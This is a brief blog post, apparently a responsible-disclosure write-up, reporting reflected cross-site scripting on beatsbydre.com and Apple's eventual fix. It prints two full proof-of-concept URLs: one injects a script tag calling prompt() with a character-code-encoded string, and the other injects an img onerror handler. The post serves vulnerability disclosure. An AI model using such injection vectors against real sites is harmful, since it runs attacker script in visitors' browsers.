/ / / / / / POC: Cross Site Scripting In BeatsByDre (By Apple)

POC: Cross Site Scripting In BeatsByDre (By Apple)

, , , , Edit



In 2014 Apple Acquired Beats. Just after acquisition I thought of testing it. So I ended up finding multiple XSS in their main domain http://beatsbydre.com. 
So what was next?? other than reporting the Bug

 Vulnerable Links were like below
http://www.beatsbydre.com/earphones/tour/red/900-00101-01.html?maxLimitError=--></

SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(34, 120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>



http://www.beatsbydre.com/headphones/mixr/beats-mixr.html?bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm&icid="><img src=1 onerror=prompt(document.domain);>//
Simple Vectors were used...
At First Apple refused to address the Vulnerability





But later on they accepted the report ,I think there was a drunken Dev on the other End...Well They accepted it and Fixed it ...
As per Apple's Cheap Policy Only Hall Of Fame Was offered as a reward..

Share on Google Plus

About Unknown

    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )